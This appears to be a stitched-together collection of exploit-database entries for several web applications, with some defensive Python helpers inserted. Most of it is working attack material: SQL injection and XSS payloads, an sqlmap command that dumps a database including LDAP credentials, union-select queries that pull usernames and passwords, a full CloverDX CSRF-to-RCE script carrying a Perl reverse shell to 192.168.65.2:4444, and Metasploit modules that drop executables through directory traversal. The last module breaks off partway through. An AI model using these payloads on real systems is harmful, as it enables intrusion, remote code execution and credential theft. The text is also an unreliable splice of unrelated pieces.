source: https://www.securityfocus.com/bid/64572/info
CMS Afroditi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CMS Afroditi 1.0 is vulnerable.
http://www.example.com/default.asp?id=25 and 0<=(SELECT count(*) FROM [site]) and 1=1
# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)
# Date: 2021-10-07
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cmder.net
# Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip
# Version: v1.3.18
# Tested on: Windows 10
# [About - Cmder Console Emulator] :
#Cmder is a software package created over absence of usable console emulator on Windows.
#It is based on ConEmu with major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout.
# [Security Issue] :
# Requires the execution of a .cmd file: the created file is opened in the emulator, which triggers the buffer overflow condition.
# E.g. λ cmder.cmd
# [POC] :
# Note: under Python 2 chr(235) is the single byte 0xEB; Python 3 would write it UTF-8 encoded.
PAYLOAD = chr(235) + "\\CMDER"
PAYLOAD = PAYLOAD * 3000
with open("cmder.cmd", "w") as f:
    f.write(PAYLOAD)
# Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
# Date: 15/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.cmdbuild.org
# Software Link: https://www.cmdbuild.org/en/download/latest-version
# Version: CMDBuild 3.3.2
# Tested on: Linux
Summary:
Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections
Proof of concept:
Stored XSS example:
1. Log in to your dashboard as a low-privilege user.
2. Click on "Basic archives" and then "Employee".
3. Click "+Add card" for Employee.
4. Enter your XSS payload in the parameters.
5. On the added employee, click "Open Relation Graph".
POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
...
Cmdbuild-Actionid: class.card.new.open
Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353
Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
X-Requested-With: XMLHttpRequest
Content-Length: 302
Connection: close
{"_type":"Employee","_tenant":"","Code":"\"><img src=x onerror=alert(1)>","Description":null,"Surname":"\"><img src=x onerror=alert(1)>","Name":"\"><img src=x onerror=alert(1)>","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}
------------------------------------------------------------------------
File upload XSS example:
1. Click on "Basic archives".
2. Click on "Workplace", then "+Add card" for Workplace.
3. Select the "attachments" icon, then "+Add attachment" and add an image.
4. Upload your SVG file with the XSS payload.
5. Click on preview, then right-click and open it in a new tab.
Request:
POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
Cmdbuild-Actionid: class.card.attachments.open
-----------------------------269319782833689825543405205260
Content-Disposition: form-data; name="file"; filename="kiwi.svg"
Content-Type: image/svg+xml
<?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 16.0.4, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
width="612px" height="502.174px" viewBox="0 65.326 612 502.174" enable-background="new 0 65.326 612 502.174"
xml:space="preserve">
<ellipse fill="#C6C6C6" cx="283.5" cy="487.5" rx="259" ry="80"/>
<path id="bird" d="M210.333,65.331C104.367,66.105-12.349,150.637,1.056,276.449c4.303,40.393,18.533,63.704,52.171,79.03
c36.307,16.544,57.022,54.556,50.406,112.954c-9.935,4.88-17.405,11.031-19.132,20.015c7.531-0.17,14.943-0.312,22.59,4.341
c20.333,12.375,31.296,27.363,42.979,51.72c1.714,3.572,8.192,2.849,8.312-3.078c0.17-8.467-1.856-17.454-5.226-26.933
c-2.955-8.313,3.059-7.985,6.917-6.106c6.399,3.115,16.334,9.43,30.39,13.098c5.392,1.407,5.995-3.877,5.224-6.991
c-1.864-7.522-11.009-10.862-24.519-19.229c-4.82-2.984-0.927-9.736,5.168-8.351l20.234,2.415c3.359,0.763,4.555-6.114,0.882-7.875
c-14.198-6.804-28.897-10.098-53.864-7.799c-11.617-29.265-29.811-61.617-15.674-81.681c12.639-17.938,31.216-20.74,39.147,43.489
c-5.002,3.107-11.215,5.031-11.332,13.024c7.201-2.845,11.207-1.399,14.791,0c17.912,6.998,35.462,21.826,52.982,37.309
c3.739,3.303,8.413-1.718,6.991-6.034c-2.138-6.494-8.053-10.659-14.791-20.016c-3.239-4.495,5.03-7.045,10.886-6.876
c13.849,0.396,22.886,8.268,35.177,11.218c4.483,1.076,9.741-1.964,6.917-6.917c-3.472-6.085-13.015-9.124-19.18-13.413
c-4.357-3.029-3.025-7.132,2.697-6.602c3.905,0.361,8.478,2.271,13.908,1.767c9.946-0.925,7.717-7.169-0.883-9.566
c-19.036-5.304-39.891-6.311-61.665-5.225c-43.837-8.358-31.554-84.887,0-90.363c29.571-5.132,62.966-13.339,99.928-32.156
c32.668-5.429,64.835-12.446,92.939-33.85c48.106-14.469,111.903,16.113,204.241,149.695c3.926,5.681,15.819,9.94,9.524-6.351
c-15.893-41.125-68.176-93.328-92.13-132.085c-24.581-39.774-14.34-61.243-39.957-91.247
c-21.326-24.978-47.502-25.803-77.339-17.365c-23.461,6.634-39.234-7.117-52.98-31.273C318.42,87.525,265.838,64.927,210.333,65.331
z M445.731,203.01c6.12,0,11.112,4.919,11.112,11.038c0,6.119-4.994,11.111-11.112,11.111s-11.038-4.994-11.038-11.111
C434.693,207.929,439.613,203.01,445.731,203.01z"/>
<script>alert(1)</script>
</svg>
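The stored XSS above works because the uploaded SVG is served and opened as a document, so its `<script>` element runs in the application's origin. As an added example (not part of the advisory or of CMDBuild), a Python upload check that parses an SVG and flags the constructs that can execute code: script-like elements, `on*` event handlers and `javascript:` hrefs. The sample SVGs are constructed; the first is modelled on the kiwi.svg shown above with its path data shortened.

```python
import xml.etree.ElementTree as ET

# Elements that let an SVG run script or embed arbitrary HTML.
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}
# URL schemes that execute or load code when used in href/xlink:href.
DANGEROUS_URL_PREFIXES = ("javascript:", "data:text/html", "vbscript:")

# Constructed sample modelled on the advisory's kiwi.svg (path data shortened).
MALICIOUS_SVG = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="612px" height="502.174px" viewBox="0 65.326 612 502.174">
<ellipse fill="#C6C6C6" cx="283.5" cy="487.5" rx="259" ry="80"/>
<path id="bird" d="M210.333,65.331 L104.367,66.105 Z"/>
<script>alert(1)</script>
</svg>"""

# Constructed: no <script>, but an inline handler and a javascript: link instead.
HANDLER_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" '
               b'onload="alert(1)"><a xlink:href="javascript:alert(1)"><circle r="10"/></a></svg>')

# Constructed: a plain drawing that should pass.
CLEAN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
             b'<ellipse fill="#C6C6C6" cx="5" cy="5" rx="4" ry="2"/></svg>')


def local_name(tag: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on qualified element/attribute names."""
    return tag.rsplit("}", 1)[-1]


def audit_svg(data: bytes) -> list:
    """Return (reason, element) findings; an empty list means nothing active was found.

    ET.fromstring does not fetch external DTDs or entities, but for untrusted input in
    production parse with defusedxml as well to block entity-expansion attacks.
    """
    root = ET.fromstring(data)
    findings = []
    for elem in root.iter():
        name = local_name(elem.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append((f"active element <{name}>", name))
        for attr, value in elem.attrib.items():
            aname = local_name(attr).lower()
            if aname.startswith("on"):
                findings.append((f"event handler {aname}", name))
            if aname == "href" and value.strip().lower().startswith(DANGEROUS_URL_PREFIXES):
                findings.append((f"script URL in {aname}", name))
    return findings


def is_safe_svg(data: bytes) -> bool:
    """Accept only SVGs with no findings. Defence in depth: also serve uploads with
    Content-Disposition: attachment or from a separate origin, since step 5 above
    (open in new tab) runs whatever an image viewer would have ignored."""
    return audit_svg(data) == []
```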
# Exploit Title: Cmaps v8.0 - SQL injection
- Date: 27.04.2023
- Exploit Author: Lucas Noki (0xPrototype)
- Vendor Homepage: https://github.com/vogtmh
- Software Link: https://github.com/vogtmh/cmaps
- Version: 8.0
- Tested on: Mac, Windows, Linux
- CVE : CVE-2023-29809
*Description:*
The vulnerability found is an SQL injection in the `bookmap` parameter. When visiting http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test we get the normal JSON response. However, if a single quote is appended to the value of the `bookmap` parameter we get an error message:
```html
<b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br />
```
If two single quotes are appended instead, we get the normal response without an error, which shows that the quote is interpreted by the SQL parser rather than treated as data. To prove the SQL injection we append the following payload:
```
'-(select*from(select+sleep(2)+from+dual)a)--+
```
The page will sleep for two seconds. This confirms the SQL injection.
*Steps to reproduce:*
1. Send the following payload to test the vulnerability: ```'-(select*from(select+sleep(2)+from+dual)a)--+```
2. If the site slept for two seconds, run the following sqlmap command to dump the whole database, including the LDAP credentials.
```shell
python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump
```
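The three probes used above (a lone quote that produces a `mysqli_num_rows()` warning, a doubled quote that restores the response, and a `sleep(2)` payload that delays it) leave a recognisable trace in web-server logs. As an added, defender-side example (not part of the write-up or of Cmaps), a Python scanner that decodes each request's query string, scores every parameter against those probe patterns and confirms a time-based injection when a delay marker coincides with a slow response. The log lines are constructed; the format (Apache combined log with the request time in microseconds appended) and the 1.5 s threshold are assumptions.

```python
import re
from typing import Optional
from urllib.parse import parse_qsl, urlsplit

# Apache combined log with "%D" (request time in microseconds) appended: an assumed format.
LOG_FORMAT = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<usec>\d+)$'
)

# Markers derived from the probes in the write-up, plus the usual UNION/tautology forms.
SQLI_MARKERS = [
    (re.compile(r"sleep\s*\(", re.I), "time-based delay"),
    (re.compile(r"benchmark\s*\(", re.I), "time-based delay"),
    (re.compile(r"\bunion\b.{0,20}\bselect\b", re.I), "union select"),
    (re.compile(r"'\s*(or|and)\s+\S+\s*=\s*\S+", re.I), "boolean tautology"),
    (re.compile(r"--\s*$|--\+|#\s*$|/\*"), "comment terminator"),
    (re.compile(r"^[^']*'[^']*$"), "unbalanced single quote"),
]

# Constructed access-log excerpt replaying the write-up's probes against the bookmap parameter.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Apr/2023:21:10:01 +0000] "GET /rest/booking/index.php?mode=list&bookmap=test HTTP/1.1" 200 512 "-" "Mozilla/5.0" 18231
203.0.113.7 - - [27/Apr/2023:21:10:05 +0000] "GET /rest/booking/index.php?mode=list&bookmap=test' HTTP/1.1" 200 388 "-" "Mozilla/5.0" 17004
203.0.113.7 - - [27/Apr/2023:21:10:09 +0000] "GET /rest/booking/index.php?mode=list&bookmap=test'' HTTP/1.1" 200 512 "-" "Mozilla/5.0" 16950
203.0.113.7 - - [27/Apr/2023:21:10:14 +0000] "GET /rest/booking/index.php?mode=list&bookmap=test'-(select*from(select+sleep(2)+from+dual)a)--+ HTTP/1.1" 200 512 "-" "Mozilla/5.0" 2019877
198.51.100.4 - - [27/Apr/2023:21:11:00 +0000] "GET /rest/booking/index.php?mode=list&bookmap=room-a HTTP/1.1" 200 530 "-" "Mozilla/5.0" 15500
"""


def analyse_line(line: str, slow_usec: int = 1_500_000) -> Optional[dict]:
    """Score one log line; None if it does not match the expected format."""
    m = LOG_FORMAT.match(line)
    if not m:
        return None
    query = urlsplit(m["target"]).query
    hits = []
    # parse_qsl decodes %xx and '+', so "sleep(2)+from" is matched as the SQL the server saw.
    for param, value in parse_qsl(query, keep_blank_values=True):
        for pattern, label in SQLI_MARKERS:
            if pattern.search(value):
                hits.append((param, label))
    slow = int(m["usec"]) >= slow_usec
    # A delay marker together with a slow response is the same confirmation the write-up uses.
    confirmed = slow and any(label == "time-based delay" for _, label in hits)
    return {"ip": m["ip"], "target": m["target"], "hits": hits,
            "slow": slow, "confirmed_time_based": confirmed}


def scan_log(text: str) -> list:
    """Return the analysed lines that carry at least one injection marker, in log order."""
    results = (analyse_line(line) for line in text.splitlines() if line.strip())
    return [r for r in results if r and r["hits"]]
```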
Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.
## Request to the server:
![Screenshot 2023-04-30 at 22.23.51](Screenshot 2023-04-30 at 22.23.51.png)
## Response from the server:
Look at the response time.
![Screenshot 2023-04-30 at 22.24.35](Screenshot 2023-04-30 at 22.24.35.png)
source: https://www.securityfocus.com/bid/55395/info
Cm3 CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/forums/search.asp?strSearchPhrase="><script>alert(0);</script>&ContainerID=&forumsearchoption=topics
http://www.example.com/search.asp?keywords="><script>alert(0);</script>&SearchType=And&CurrentPage=1
http://www.example.com/search.asp?CurrentPage=1&sitekeywords"><script>alert(0);</script>&SearchType=Default
http://www.example.com/search.asp?SearchType=Keywords&Keywords="><script>alert(0);</script>&x=0&y=0
source: https://www.securityfocus.com/bid/62010/info
cm3 Acora CMS is prone to an information-disclosure vulnerability.
Successful exploits of this issue lead to disclosure of sensitive information which may aid in launching further attacks.
http://www.example.com/AcoraCMS/Admin/top.aspx
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ4NjIxMDUxOQ9kFgJmD2QWAgIDD2QWAgIBD2QWCmYPFgIeBFRleHQFJERpZ2l0YWxTZWMgTmV0d29ya3MgV2Vic2l0ZWQCAQ8WAh8ABQpFbnRlcnByaXNlZAICDw8WAh8ABQt2NS40LjUvNGEtY2RkAgMPFgIfAAUgQW5vbnltb3VzIChQdWJsaWMgSW50ZXJuZXQgVXNlcilkAgQPDxYCHgdWaXNpYmxlaGRkZIL9u8OSlqqnBHGwtssOBV5lciAoCg" /></div>
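The `__VIEWSTATE` value above can be read by anyone who receives the page: ASP.NET serialises view state with the ObjectStateFormatter (output starts with the bytes 0xFF 0x01) and, unless `viewStateEncryptionMode` is enabled in `<pages>`, only appends a MAC, which prevents tampering but not reading. As an added example (not from the advisory or from Acora CMS), a Python audit helper that decodes the token copied from the page and lists the readable strings an auditor should assume are exposed; the helper and its verdict rule are assumptions of this example.

```python
import base64
import re

# __VIEWSTATE value as disclosed by the Acora CMS admin page above (copied from the advisory).
DISCLOSED_VIEWSTATE = (
    "/wEPDwUKLTQ4NjIxMDUxOQ9kFgJmD2QWAgIDD2QWAgIBD2QWCmYPFgIeBFRleHQFJERpZ2l0YWxTZWMg"
    "TmV0d29ya3MgV2Vic2l0ZWQCAQ8WAh8ABQpFbnRlcnByaXNlZAICDw8WAh8ABQt2NS40LjUvNGEtY2Rk"
    "AgMPFgIfAAUgQW5vbnltb3VzIChQdWJsaWMgSW50ZXJuZXQgVXNlcilkAgQPDxYCHgdWaXNpYmxlaGRk"
    "ZIL9u8OSlqqnBHGwtssOBV5lciAoCg"
)

# ObjectStateFormatter (the serializer behind __VIEWSTATE) starts its output with these two bytes.
LOS_MARKER = b"\xff\x01"
# Runs of four or more printable ASCII bytes, the same heuristic `strings` uses.
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")


def decode_viewstate(value: str) -> bytes:
    """Base64-decode a __VIEWSTATE token, restoring any padding dropped when it was copied."""
    return base64.b64decode(value + "=" * (-len(value) % 4))


def inspect_viewstate(value: str) -> dict:
    """Report what a reader learns from a ViewState token without any server key."""
    raw = decode_viewstate(value)
    plaintext_format = raw.startswith(LOS_MARKER)
    strings = [m.decode("ascii") for m in PRINTABLE_RUN.findall(raw)]
    return {
        "length": len(raw),
        # True means the token is the serialized state itself, i.e. it was never encrypted:
        # enableViewStateMac="true" only stops tampering; viewStateEncryptionMode="Always"
        # is the setting that hides the content below.
        "plaintext_format": plaintext_format,
        # For the disclosed token this yields the site name, edition ("Enterprise"), a
        # version string ("v5.4.5/...") and the role label "Anonymous (Public Internet User)".
        "strings": strings,
    }


def leaks_readable_state(value: str) -> bool:
    """Audit verdict (this example's rule): unencrypted format plus a readable string of 8+ chars."""
    report = inspect_viewstate(value)
    return report["plaintext_format"] and any(len(s) >= 8 for s in report["strings"])
```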
# # # # #
# Exploit Title: CLUB-8 EMS - Event Management System - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://rexbd.net/
# Software Buy: https://codecanyon.net/item/club8-ems-event-management-system-a-to-z/14067759
# Demo: http://ems.rexbd.net/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Log in as a salesman user
# http://localhost/[PATH]/editwatch.php?id=[SQL]
-999'+/*!50000union*/+select+group_concat(username,char(58),password),0x496873616e2053656e63616e,0x7777772e696873616e2e6e6574,4,5,6,7,8,9,10,11,12,13,14+from+users-- -
#
# http://localhost/[PATH]/editwatch.php?id=[SQL]
-999'+/*!50000union*/+select+1,group_concat(username,char(58),password)+from+users-- -
# # # # #
# Exploit Title: CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE)
# Date: 14.04.2021
# Exploit Author: niebardzo
# Vendor Homepage: https://www.cloverdx.com/
# Software Link: https://github.com/cloverdx/cloverdx-server-docker
# Version: 5.9.0, 5.8.1, 5.8.0, 5.7.0, 5.6.x, 5.5.x, 5.4.x
# Tested on: Docker image - https://github.com/cloverdx/cloverdx-server-docker
# CVE : CVE-2021-29995
# Replace the target, payload and port to host the exploitation server. The exploit requires an inbound connection to CloverDX,
# a victim authenticated to CloverDX, and Java to run ViewStateCracker.java.
# Reference for cracking ViewState:
# https://jazzy.id.au/2010/09/20/cracking_random_number_generators_part_1.html
# https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2
#
import http.server
import socketserver
import requests
from urllib.parse import urlparse
from urllib.parse import parse_qs
from bs4 import BeautifulSoup
from base64 import b64decode  # needed by the ViewstateCracker.java dropper below; was missing
import subprocess
import sys
import json


class ExploitHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.end_headers()
        # replace with your own target
        target = "http://localhost:8080"
        query_comp = parse_qs(urlparse(self.path).query)
        if "target" in query_comp:
            target = query_comp["target"][0]
        req = requests.get(target + "/clover/gui/login.jsf")
        if req.status_code != 200:
            sys.exit(-1)
        # parse the response and retrieve the ViewState
        soup = BeautifulSoup(req.text, "html.parser")
        cur_view_state = soup.find("input", {"name": "javax.faces.ViewState"})["value"]
        # Use ViewstateCracker.java to get the new ViewState.
        new_view_state = subprocess.check_output(["java", "ViewstateCracker.java", cur_view_state])
        new_view_state = new_view_state.decode("utf-8").strip()
        print(new_view_state)
        if new_view_state == "6927638971750518694:6717304323717288036":
            html = ("<!DOCTYPE html><html><head></head><body><h1>Hello Clover Admin!</h1><br>"
                    + "<script>window.setTimeout(function () { location.reload()}, 1500)</script></body></html>")
        else:
            html = ("<!DOCTYPE html><html><head>"
                    + "<script>"
                    + "function exec1(){document.getElementById('form1').submit(); setTimeout(exec2, 2000);}"
                    + "function exec2(){document.getElementById('form2').submit(); setTimeout(exec3, 2000);}"
                    + "function exec3(){document.getElementById('form3').submit(); setTimeout(exec4, 2000);}"
                    + "function exec4(){document.getElementById('form4').submit();}"
                    + "</script>"
                    + "</head><body onload='exec1();'><h1>Hello Clover Admin! Please wait here, content is loading...</h1>"
                    + "<script>history.pushState('','/');</script>"
                    + "<form target='if1' id='form1' method='GET' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
                    + "<input type='submit' value='' style='visibility: hidden;'></form> "
                    + "<form target='if2' id='form2' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
                    + "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
                    + "<input type='hidden' value='headerForm:manualListenerItem' name='javax.faces.source'>"
                    + "<input type='hidden' value='@all' name='javax.faces.partial.execute'>"
                    + "<input type='hidden' value='allContent' name='javax.faces.partial.render'>"
                    + "<input type='hidden' value='headerForm:manualListenerItem' name='headerForm:manualListenerItem'>"
                    + "<input type='hidden' value='headerForm' name='headerForm'>"
                    + "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":", ":"))
                    + "<input type='submit' value='' style='visibility: hidden;'></form> "
                    + "<form target='if3' id='form3' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
                    + "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
                    + "<input type='hidden' value='manualListeneForm:taskType' name='javax.faces.source'>"
                    + "<input type='hidden' value='manualListeneForm:taskType' name='javax.faces.partial.execute'>"
                    + "<input type='hidden' value='manualListeneForm:taskFormFragment' name='javax.faces.partial.render'>"
                    + "<input type='hidden' value='valueChange' name='javax.faces.behavior.event'>"
                    + "<input type='hidden' value='change' name='javax.faces.partial.event'>"
                    + "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>"
                    + "<input type='hidden' value='shell_command' name='manualListeneForm:taskType_input'>"
                    + "<input type='hidden' value='on' name='manualListeneForm:saveRunRecord_input'>"
                    + "<input type='hidden' value='true' name='manualListeneForm:manualVariablesList_collapsed'>"
                    + "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":", ":"))
                    + "<input type='submit' value='' style='visibility: hidden;'></form> "
                    + "<form target='if4' id='form4' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
                    + "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
                    + "<input type='hidden' value='manualListeneForm:execute_button' name='javax.faces.source'>"
                    + "<input type='hidden' value='@all' name='javax.faces.partial.execute'>"
                    + "<input type='hidden' value='rightContent' name='javax.faces.partial.render'>"
                    + "<input type='hidden' value='manualListeneForm:execute_button' name='manualListeneForm:execute_button'>"
                    + "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>"
                    + "<input type='hidden' value='' name='manualListeneForm:properties:propertiesTable:propName'>"
                    + "<input type='hidden' value='' name='manualListeneForm:properties:propertiesTable:propValue'>"
                    + "<input type='hidden' value='' name='manualListeneForm:taskType_focus'>"
                    + "<input type='hidden' value='shell_command' name='manualListeneForm:taskType_input'>"
                    #
                    # Below is the HTML-encoded perl reverse shell; replace with your own payload, remember to HTML encode
                    # (the quotes inside the attribute value must stay as &quot; and &#39; or the Python string breaks).
                    #
                    + "<input type='hidden' value='perl -e &#39;use Socket;$i=&quot;192.168.65.2&quot;;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;/bin/sh -i&quot;);};&#39;' name='manualListeneForm:shellEditor'>"
                    + "<input type='hidden' value='' name='manualListeneForm:workingDirectory'>"
                    + "<input type='hidden' value='10000' name='manualListeneForm:timeout'>"
                    + "<input type='hidden' value='true' name='manualListeneForm:scriptVariablesList_collapsed'>"
                    + "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":", ":"))
                    + "<input type='submit' value='' style='visibility: hidden;'></form> "
                    + "<iframe name='if1' style='display: hidden;' width='0' height='0' frameborder='0' ></iframe>"
                    + "<iframe name='if2' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
                    + "<iframe name='if3' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
                    + "<iframe name='if4' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
                    + "</body></html>")
        self.wfile.write(bytes(html, "utf-8"))


base64_enc_viewstatecracker = "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"
#
# This drops ViewstateCracker.java from above, ref: https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2
#
with open("ViewstateCracker.java", "w") as f:
    f.write(b64decode(bytes(base64_enc_viewstatecracker, 'utf-8')).decode('utf-8'))

exploit_handler = ExploitHandler
PORT = 6010
exploit_server = socketserver.TCPServer(("", PORT), exploit_handler)
exploit_server.serve_forever()
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Rex::Proto::TFTP
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Cloudview NMS 2.00b Writable Directory Traversal Execution",
      'Description'    => %q{
        This module exploits a vulnerability found in Cloudview NMS server. The
        software contains a directory traversal vulnerability that allows a remote
        attacker to write arbitrary file to the file system, which results in
        code execution under the context 'SYSTEM'.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'james fitts' ],
      'References'     =>
        [
          ['URL', '0day']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => "none"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Cloudview NMS 2.00b on Windows', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Oct 13 2014",
      'DefaultTarget'  => 0))

    register_options([
      OptInt.new('DEPTH', [ false, "Levels to reach base directory", 5 ]),
      OptAddress.new('RHOST', [ true, "The remote TFTP server address" ]),
      OptPort.new('RPORT', [ true, "The remote TFTP server port", 69 ])
    ], self.class)
  end

  def upload(filename, data)
    tftp_client = Rex::Proto::TFTP::Client.new(
      "LocalHost"  => "0.0.0.0",
      "LocalPort"  => 1025 + rand(0xffff-1025),
      "PeerHost"   => datastore['RHOST'],
      "PeerPort"   => datastore['RPORT'],
      "LocalFile"  => "DATA:#{data}",
      "RemoteFile" => filename,
      "Mode"       => "octet",
      "Context"    => {'Msf' => self.framework, "MsfExploit" => self },
      "Action"     => :upload
    )

    ret = tftp_client.send_write_request { |msg| print_status(msg) }
    while not tftp_client.complete
      select(nil, nil, nil, 1)
      tftp_client.stop
    end
  end

  def exploit
    peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
    exe_name = rand_text_alpha(rand(10)+5) + '.exe'
    exe = generate_payload_exe
    mof_name = rand_text_alpha(rand(10)+5) + '.mof'
    mof = generate_mof(mof_name, exe_name)

    depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
    levels = "../" * depth

    print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")
    upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)
    select(nil, nil, nil, 1)

    print_status("#{peer} - Uploading .mof...")
    upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
  end
end
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Cloudview NMS File Upload',
      'Description'    => %q{
        This module exploits a file upload vulnerability
        found within Cloudview NMS < 2.00b. The vulnerability
        is triggered by sending specialized packets to the
        server with directory traversal sequences (..@ in
        this case) to browse outside of the web root.
      },
      'Author'         => [ 'james fitts' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', '0day' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Cloudview NMS 2.00b on Windows', {} ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 13 2014'))

    register_options([
      Opt::RPORT(80),
      OptString.new('USERNAME', [ true, "The username to log in with", "Admin" ]),
      OptString.new('PASSWORD', [ false, "The password to log in with", "" ])
    ], self.class)
  end

  def exploit
    # setup
    vbs_name = rand_text_alpha(rand(10)+5) + '.vbs'
    exe = generate_payload_exe
    vbs_content = Msf::Util::EXE.to_exe_vbs(exe)
    # the MOF needs a .mof extension (the original read '.vbs') for the wbem\mof drop directory to compile it
    mof_name = rand_text_alpha(rand(10)+5) + '.mof'
    mof = generate_mof(mof_name, vbs_name)
    peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"

    print_status("Uploading #{vbs_name} to #{peer}...")

    # logging in to get the "session"
    @sess = rand(0..2048)
